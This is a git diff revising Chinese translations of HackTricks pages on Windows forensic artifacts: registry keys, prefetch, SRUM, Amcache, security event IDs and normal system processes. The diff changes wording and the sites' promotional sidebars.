* [**Windows注册表恢复**](https://www.mitec.cz/wrr.html):另一个能够提取注册表中重要信息的GUI应用程序。
|
||||
|
||||
### 恢复已删除元素
|
||||
|
||||
当键被删除时,会标记为已删除,但直到需要占用的空间时才会被删除。因此,使用诸如**注册表浏览器**之类的工具可以恢复这些已删除的键。
|
||||
删除键时会标记为已删除,但在需要占用其空间之前不会被删除。因此,使用诸如**注册表浏览器**之类的工具可以恢复这些已删除的键。
|
||||
|
||||
### 最后写入时间
|
||||
|
||||
|
@ -272,9 +273,9 @@ Windows注册表存储广泛的系统和用户活动数据,包含在以下文
|
|||
|
||||
### SAM
|
||||
|
||||
文件/注册表**SAM**包含系统的**用户、组和用户密码**哈希。
|
||||
文件/数据库**SAM**包含系统的**用户、组和用户密码**哈希。
|
||||
|
||||
在`SAM\Domains\Account\Users`中,您可以获取用户名、RID、上次登录、上次登录失败、登录计数器、密码策略以及帐户创建时间。要获取**哈希值**,还需要文件/注册表**SYSTEM**。
|
||||
在`SAM\Domains\Account\Users`中,您可以获取用户名、RID、上次登录、上次登录失败、登录计数器、密码策略以及帐户创建时间。要获取**哈希值**,还需要文件/数据库**SYSTEM**。
|
||||
|
||||
### Windows注册表中的有趣条目
|
||||
|
||||
|
@ -288,23 +289,23 @@ Windows注册表存储广泛的系统和用户活动数据,包含在以下文
|
|||
|
||||
在[此文章](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d)中,您可以了解常见的Windows进程,以便检测可疑行为。
|
||||
|
||||
### Windows最近的应用程序
|
||||
### Windows最近使用的应用程序
|
||||
|
||||
在注册表`NTUSER.DAT`的路径`Software\Microsoft\Current Version\Search\RecentApps`中,您可以找到有关**执行的应用程序**、**上次执行时间**以及**启动次数**的信息。
|
||||
|
||||
### BAM(后台活动调节器)
|
||||
|
||||
您可以使用注册表编辑器打开`SYSTEM`文件,在路径`SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`中,您可以找到有关每个用户执行的**应用程序**的信息(注意路径中的`{SID}`),以及它们执行的**时间**(时间在注册表的数据值中)。
|
||||
您可以使用注册表编辑器打开`SYSTEM`文件,在路径`SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`中,您可以找到有关每个用户执行的**应用程序**的信息(注意路径中的`{SID}`),以及它们执行的**时间**(时间位于注册表的数据值中)。
|
||||
|
||||
### Windows预取
|
||||
|
||||
预取是一种技术,允许计算机默默地**获取显示内容所需的资源**,用户**可能在不久的将来访问**,以便更快地访问资源。
|
||||
|
||||
Windows预取包括创建**已执行程序的缓存**,以便更快地加载它们。这些缓存以`.pf`文件的形式创建在路径:`C:\Windows\Prefetch`。在XP/VISTA/WIN7中限制为128个文件,在Win8/Win10中为1024个文件。
|
||||
Windows预取包括创建**已执行程序的缓存**,以便更快地加载它们。这些缓存以`.pf`文件的形式创建在路径:`C:\Windows\Prefetch`中。在XP/VISTA/WIN7中限制为128个文件,在Win8/Win10中为1024个文件。
|
||||
|
||||
文件名创建为`{program_name}-{hash}.pf`(哈希基于可执行文件的路径和参数)。在W10中,这些文件是压缩的。请注意,文件的存在仅表示**该程序曾被执行**。
|
||||
|
||||
文件`C:\Windows\Prefetch\Layout.ini`包含**预取文件夹的名称**。该文件包含有关执行次数的信息,执行的**日期**以及程序打开的**文件**。
|
||||
文件`C:\Windows\Prefetch\Layout.ini`包含**预取文件夹的名称**。该文件包含有关执行次数的信息,执行日期以及程序**打开的文件**。
|
||||
|
||||
要检查这些文件,可以使用工具[**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
|
||||
```bash
|
||||
|
@ -314,30 +315,30 @@ Windows预取包括创建**已执行程序的缓存**,以便更快地加载它
|
|||
|
||||
### Superprefetch
|
||||
|
||||
**Superprefetch**的目标与prefetch相同,通过预测下一个加载的内容来**加快程序加载速度**。但是,它并不取代prefetch服务。\
|
||||
该服务会在`C:\Windows\Prefetch\Ag*.db`中生成数据库文件。
|
||||
**Superprefetch** 的目标与 prefetch 相同,通过预测下一个加载的内容来**更快地加载程序**。但是,它并不取代 prefetch 服务。\
|
||||
该服务会在 `C:\Windows\Prefetch\Ag*.db` 中生成数据库文件。
|
||||
|
||||
在这些数据库中,您可以找到**程序的名称**、**执行次数**、**打开的文件**、**访问的卷**、**完整路径**、**时间范围**和**时间戳**。
|
||||
|
||||
您可以使用工具[**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/)访问这些信息。
|
||||
您可以使用工具 [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/) 访问这些信息。
|
||||
|
||||
### SRUM
|
||||
|
||||
**系统资源使用监视器**(SRUM)**监视**进程**消耗的资源**。它出现在W8中,并将数据存储在位于`C:\Windows\System32\sru\SRUDB.dat`的ESE数据库中。
|
||||
**系统资源使用监视器**(SRUM)**监视**进程**消耗的资源**。它出现在 W8 中,并将数据存储在位于 `C:\Windows\System32\sru\SRUDB.dat` 中的 ESE 数据库中。
|
||||
|
||||
它提供以下信息:
|
||||
|
||||
* 应用程序ID和路径
|
||||
* 应用程序 ID 和路径
|
||||
* 执行该进程的用户
|
||||
* 发送字节数
|
||||
* 接收字节数
|
||||
* 发送字节
|
||||
* 接收字节
|
||||
* 网络接口
|
||||
* 连接持续时间
|
||||
* 进程持续时间
|
||||
|
||||
此信息每60分钟更新一次。
|
||||
此信息每 60 分钟更新一次。
|
||||
|
||||
您可以使用工具[**srum\_dump**](https://github.com/MarkBaggett/srum-dump)从此文件中获取日期。
|
||||
您可以使用工具 [**srum\_dump**](https://github.com/MarkBaggett/srum-dump) 从此文件中获取日期。
|
||||
```bash
|
||||
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
|
||||
```
|
||||
|
@ -391,7 +392,7 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen
|
|||
### **Windows商店**
|
||||
|
||||
安装的应用程序可以在`\ProgramData\Microsoft\Windows\AppRepository\`中找到。\
|
||||
此存储库中有一个**日志**,其中包含系统中安装的**每个应用程序**的信息,存储在数据库**`StateRepository-Machine.srd`**中。
|
||||
此存储库中有一个**日志**,其中包含系统中安装的**每个应用程序**的信息,存储在名为**`StateRepository-Machine.srd`**的数据库中。
|
||||
|
||||
在此数据库的Application表中,可以找到列:"Application ID"、"PackageNumber"和"Display Name"。这些列包含有关预安装和已安装应用程序的信息,可以查看某些应用程序是否已被卸载,因为已安装应用程序的ID应该是连续的。
|
||||
|
||||
|
@ -408,9 +409,9 @@ Windows事件中显示的信息包括:
|
|||
* 涉及的主机(主机名,IP)
|
||||
* 访问的资产(文件,文件夹,打印机,服务)
|
||||
|
||||
日志位于Windows Vista之前的`C:\Windows\System32\config`中,在Windows Vista之后位于`C:\Windows\System32\winevt\Logs`中。在Windows Vista之前,事件日志以二进制格式存储,在Windows Vista之后,它们以**XML格式**存储,并使用**.evtx**扩展名。
|
||||
日志位于Windows Vista之前的`C:\Windows\System32\config`中,之后位于`C:\Windows\System32\winevt\Logs`中。在Windows Vista之前,事件日志以二进制格式存储,之后以**XML格式**存储,并使用**.evtx**扩展名。
|
||||
|
||||
事件文件的位置可以在SYSTEM注册表中的**`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**中找到
|
||||
事件文件的位置可以在SYSTEM注册表中的**`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**中找到。
|
||||
|
||||
可以使用Windows事件查看器(**`eventvwr.msc`**)或其他工具如[**Event Log Explorer**](https://eventlogxp.com) **或** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**来可视化这些事件。**
|
||||
|
||||
|
@ -429,7 +430,7 @@ Windows事件中显示的信息包括:
|
|||
|
||||
- **Interactive (2)**:直接用户登录。
|
||||
- **Network (3)**:访问共享文件夹。
|
||||
- **Batch (4)**:批处理进程的执行。
|
||||
- **Batch (4)**:执行批处理过程。
|
||||
- **Service (5)**:服务启动。
|
||||
- **Proxy (6)**:代理身份验证。
|
||||
- **Unlock (7)**:使用密码解锁屏幕。
|
||||
|
@ -446,18 +447,18 @@ Windows事件中显示的信息包括:
|
|||
- **0xC000006A**:正确的用户名但密码错误 - 可能是密码猜测或暴力破解尝试。
|
||||
- **0xC0000234**:用户帐户被锁定 - 可能是多次登录失败导致的暴力破解攻击。
|
||||
- **0xC0000072**:帐户已禁用 - 未经授权的尝试访问已禁用的帐户。
|
||||
- **0xC000006F**:在允许的时间之外登录 - 表示尝试在设置的登录时间之外访问,可能是未经授权访问的迹象。
|
||||
- **0xC000006F**:在允许的时间外登录 - 表示尝试在设置的登录时间之外访问,可能是未经授权访问的迹象。
|
||||
- **0xC0000070**:违反工作站限制 - 可能是尝试从未经授权的位置登录。
|
||||
- **0xC0000193**:帐户过期 - 使用已过期用户帐户的访问尝试。
|
||||
- **0xC0000071**:密码已过期 - 使用过时密码的登录尝试。
|
||||
- **0xC0000071**:密码过期 - 使用过时密码的登录尝试。
|
||||
- **0xC0000133**:时间同步问题 - 客户端和服务器之间存在较大的时间差异,可能表明更复杂的攻击,如票据传递攻击。
|
||||
- **0xC0000224**:需要强制更改密码 - 频繁的强制更改可能表明试图破坏帐户安全性。
|
||||
- **0xC0000224**:需要强制更改密码 - 频繁强制更改可能表明试图破坏帐户安全性。
|
||||
- **0xC0000225**:表示系统错误而不是安全问题。
|
||||
- **0xC000015b**:拒绝的登录类型 - 使用未经授权的登录类型进行访问尝试,例如用户尝试执行服务登录。
|
||||
|
||||
#### EventID 4616:
|
||||
|
||||
- **时间更改**:修改系统时间,可能混淆事件时间轴。
|
||||
- **时间更改**:修改系统时间,可能掩盖事件时间线。
|
||||
|
||||
#### EventID 6005和6006:
|
||||
|
||||
|
@ -467,15 +468,15 @@ Windows事件中显示的信息包括:
|
|||
|
||||
- **日志删除**:清除安全日志,通常是掩盖非法活动的红旗。
|
||||
|
||||
#### 用于USB设备跟踪的EventID:
|
||||
#### 用于USB设备跟踪的事件ID:
|
||||
|
||||
- **20001 / 20003 / 10000**:USB设备首次连接。
|
||||
- **10100**:USB驱动程序更新。
|
||||
- **EventID 112**:USB设备插入时间。
|
||||
|
||||
要了解有关模拟这些登录类型和凭据转储机会的实际示例,请参阅[Altered Security的详细指南](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)。
|
||||
有关模拟这些登录类型和凭据转储机会的实际示例,请参阅[Altered Security的详细指南](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)。
|
||||
|
||||
事件详细信息,包括状态和子状态代码,可进一步了解事件原因,特别是在Event ID 4625中。
|
||||
事件详细信息,包括状态和子状态代码,可进一步了解事件原因,特别是在事件ID 4625中。
|
||||
|
||||
### 恢复Windows事件
|
||||
|
||||
|
@ -483,7 +484,7 @@ Windows事件中显示的信息包括:
|
|||
|
||||
### 通过Windows事件识别常见攻击
|
||||
|
||||
要全面了解如何使用Windows事件ID识别常见网络攻击,请访问[Red Team Recipe](https://redteamrecipe.com/event-codes/)。
|
||||
有关使用Windows事件ID识别常见网络攻击的全面指南,请访问[Red Team Recipe](https://redteamrecipe.com/event-codes/)。
|
||||
|
||||
#### 暴力破解攻击
|
||||
|
||||
|
@ -495,30 +496,31 @@ Windows事件中显示的信息包括:
|
|||
|
||||
#### USB设备跟踪
|
||||
|
||||
用于USB设备跟踪的有用的系统EventID包括用于初始使用的20001/20003/10000,用于驱动程序更新的10100,以及来自DeviceSetupManager的插入时间戳的EventID 112。
|
||||
用于USB设备跟踪的有用的系统事件ID包括用于初始使用的20001/20003/10000,用于驱动程序更新的10100,以及来自DeviceSetupManager的插入时间戳的EventID 112。
|
||||
#### 系统电源事件
|
||||
|
||||
EventID 6005 表示系统启动,而 EventID 6006 表示关机。
|
||||
|
||||
#### 日志删除
|
||||
|
||||
安全事件 EventID 1102 表示日志删除,这是进行取证分析的关键事件。
|
||||
安全事件ID 1102 表示日志删除,这是进行取证分析的关键事件。
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想在 HackTricks 中看到您的 **公司广告** 或 **下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -2,20 +2,20 @@
|
|||
|
||||
### 有趣的Windows注册表键
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS&HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
|
||||
{% endhint %}
|
||||
|
||||
### **Windows版本和所有者信息**
|
||||
- 位于**`Software\Microsoft\Windows NT\CurrentVersion`**,您将找到Windows版本、服务包、安装时间以及注册所有者的名称。
|
||||
|
@ -31,44 +31,44 @@
|
|||
`fsutil behavior set disablelastaccess 0`
|
||||
|
||||
### Windows版本和服务包
|
||||
- **Windows版本**指示版本(例如,家庭版、专业版)及其发布(例如,Windows 10、Windows 11),而**服务包**是包含修复和有时新功能的更新。
|
||||
- **Windows版本**指示版本(例如,家庭版、专业版)及其发布(例如,Windows 10、Windows 11),而**服务包**是包含修复程序和有时新功能的更新。
|
||||
|
||||
### 启用最后访问时间
|
||||
- 启用最后访问时间跟踪允许您查看文件上次打开的时间,这对于取证分析或系统监控至关重要。
|
||||
|
||||
### 网络信息详细信息
|
||||
- 注册表中保存了大量关于网络配置的数据,包括**网络类型(无线、有线、3G)**和**网络类别(公共、私人/家庭、域/工作)**,这对于了解网络安全设置和权限至关重要。
|
||||
- 注册表中保存了大量关于网络配置的数据,包括**网络类型(无线、有线、3G)**和**网络类别(公共、私人/家庭、域/工作)**,这对于理解网络安全设置和权限至关重要。
|
||||
|
||||
### 客户端端缓存(CSC)
|
||||
- **CSC**通过缓存共享文件的副本来增强离线文件访问。不同的**CSCFlags**设置控制着如何以及哪些文件被缓存,影响性能和用户体验,特别是在网络连接不稳定的环境中。
|
||||
- **CSC**通过缓存共享文件的副本来增强离线文件访问。不同的**CSCFlags**设置控制如何以及哪些文件被缓存,影响性能和用户体验,特别是在网络连接不稳定的环境中。
|
||||
|
||||
### 自启动程序
|
||||
- 在各种`Run`和`RunOnce`注册表键中列出的程序会在启动时自动运行,影响系统启动时间,并有可能成为识别恶意软件或不需要的软件的关注点。
|
||||
|
||||
### Shellbags
|
||||
- **Shellbags**不仅存储文件夹视图的偏好设置,还提供了对文件夹访问的取证证据,即使文件夹已经不存在。它们对于调查非常宝贵,揭示了通过其他方式不明显的用户活动。
|
||||
- **Shellbags**不仅存储文件夹视图的偏好设置,还提供了即使文件夹不存在也能提供文件夹访问的取证证据。它们对于调查非常宝贵,揭示了通过其他方式不明显的用户活动。
|
||||
|
||||
### USB信息和取证
|
||||
- 注册表中存储的有关USB设备的详细信息可以帮助跟踪连接到计算机的设备,可能将设备与敏感文件传输或未经授权访问事件联系起来。
|
||||
|
||||
### 卷序列号
|
||||
- **卷序列号**对于跟踪特定文件系统实例至关重要,在需要在不同设备之间建立文件来源的取证场景中非常有用。
|
||||
- **卷序列号**对于跟踪文件系统的特定实例至关重要,在需要在不同设备之间建立文件来源的取证场景中非常有用。
|
||||
|
||||
### **关机详细信息**
|
||||
- 关机时间和计数(仅适用于XP)保存在**`System\ControlSet001\Control\Windows`**和**`System\ControlSet001\Control\Watchdog\Display`**中。
|
||||
|
||||
### **网络配置**
|
||||
- 有关详细网络接口信息,请参考**`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**。
|
||||
- 首次和最后一次网络连接时间,包括VPN连接,在**`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**的各个路径下记录。
|
||||
- 首次和最后的网络连接时间,包括VPN连接,在**`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**的各个路径下记录。
|
||||
|
||||
### **共享文件夹**
|
||||
- 共享文件夹和设置位于**`System\ControlSet001\Services\lanmanserver\Shares`**。客户端端缓存(CSC)设置决定了离线文件的可用性。
|
||||
- 共享文件夹和设置位于**`System\ControlSet001\Services\lanmanserver\Shares`**。客户端端缓存(CSC)设置决定离线文件的可用性。
|
||||
|
||||
### **自动启动的程序**
|
||||
- 类似**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`**和`Software\Microsoft\Windows\CurrentVersion`下的条目详细说明了设置为在启动时运行的程序。
|
||||
|
||||
### **搜索和键入路径**
|
||||
- 在注册表中,**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**下跟踪了资源管理器搜索和键入的路径,分别为WordwheelQuery和TypedPaths。
|
||||
- 在注册表中跟踪的资源管理器搜索和键入的路径分别位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**下的WordwheelQuery和TypedPaths。
|
||||
|
||||
### **最近文档和Office文件**
|
||||
- 访问的最近文档和Office文件记录在`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`和特定Office版本路径中。
|
||||
|
@ -77,29 +77,30 @@
|
|||
- MRU列表,指示最近的文件路径和命令,存储在`NTUSER.DAT`的各个`ComDlg32`和`Explorer`子键中。
|
||||
|
||||
### **用户活动跟踪**
|
||||
- 用户助手功能记录了详细的应用程序使用统计信息,包括运行次数和最后运行时间,位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**。
|
||||
- 用户助手功能记录详细的应用程序使用统计信息,包括运行次数和上次运行时间,位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**。
|
||||
|
||||
### **Shellbags分析**
|
||||
- 存储着文件夹访问详细信息的Shellbags存储在`USRCLASS.DAT`和`NTUSER.DAT`的`Software\Microsoft\Windows\Shell`下。使用**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**进行分析。
|
||||
- 存储文件夹访问详细信息的Shellbags位于`USRCLASS.DAT`和`NTUSER.DAT`的`Software\Microsoft\Windows\Shell`下。使用**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**进行分析。
|
||||
|
||||
### **USB设备历史**
|
||||
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`**和**`HKLM\SYSTEM\ControlSet001\Enum\USB`**包含有关连接的USB设备的丰富详细信息,包括制造商、产品名称和连接时间戳。
|
||||
- 可通过搜索`NTUSER.DAT`中的设备的**{GUID}**来确定与特定USB设备关联的用户。
|
||||
- 可通过`System\MountedDevices`和`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`分别追踪最后安装的设备及其卷序列号。
|
||||
- 最后安装的设备及其卷序列号可以通过`System\MountedDevices`和`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`追踪。
|
||||
|
||||
本指南总结了访问Windows系统上详细系统、网络和用户活动信息的关键路径和方法,旨在清晰易用。
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS&HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,88 +1,89 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 **HackTricks** 和 **HackTricks Cloud** 的 github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
## smss.exe
|
||||
|
||||
**会话管理器**。\
|
||||
会话0启动**csrss.exe**和**wininit.exe**(**操作系统服务**),而会话1启动**csrss.exe**和**winlogon.exe**(**用户会话**)。但是,您应该在进程树中看到**只有一个该二进制文件的进程**,没有子进程。
|
||||
会话 0 启动 **csrss.exe** 和 **wininit.exe**(**操作系统服务**),而会话 1 启动 **csrss.exe** 和 **winlogon.exe**(**用户会话**)。但是,您应该在进程树中看到该**二进制文件的一个进程**,没有子进程。
|
||||
|
||||
此外,除了0和1之外的会话可能意味着正在发生RDP会话。
|
||||
此外,除了 0 和 1 会话外,可能表示正在发生 RDP 会话。
|
||||
|
||||
|
||||
## csrss.exe
|
||||
|
||||
**客户端/服务器运行子系统进程**。\
|
||||
它管理**进程**和**线程**,使**Windows API**可用于其他进程,还**映射驱动器**,创建**临时文件**,处理**关机过程**。
|
||||
它管理**进程**和**线程**,使**Windows API**可用于其他进程,还**映射驱动器号**,创建**临时文件**,处理**关机过程**。
|
||||
|
||||
在会话0中有一个,在会话1中有另一个(因此在进程树中有**2个进程**)。每个新会话都会创建另一个。
|
||||
在会话 0 中有一个,会话 1 中有另一个(因此在进程树中有**2个进程**)。每个新会话都会创建另一个。
|
||||
|
||||
|
||||
## winlogon.exe
|
||||
|
||||
**Windows登录进程**。\
|
||||
它负责用户**登录**/**注销**。它启动**logonui.exe**以请求用户名和密码,然后调用**lsass.exe**来验证它们。
|
||||
**Windows 登录进程**。\
|
||||
负责用户**登录**/**注销**。它启动 **logonui.exe** 以请求用户名和密码,然后调用 **lsass.exe** 进行验证。
|
||||
|
||||
然后它启动在**`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`**中指定的**userinit.exe**,键为**Userinit**。
|
||||
然后启动指定在 **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** 中的 **Userinit** 键的 **userinit.exe**。
|
||||
|
||||
此外,前面的注册表中应该在**Shell键**中有**explorer.exe**,否则可能被滥用为**恶意软件持久性方法**。
|
||||
此外,前面的注册表中应该在 **Shell 键** 中有 **explorer.exe**,否则可能被滥用为**恶意软件持久性方法**。
|
||||
|
||||
|
||||
## wininit.exe
|
||||
|
||||
**Windows初始化进程**。\
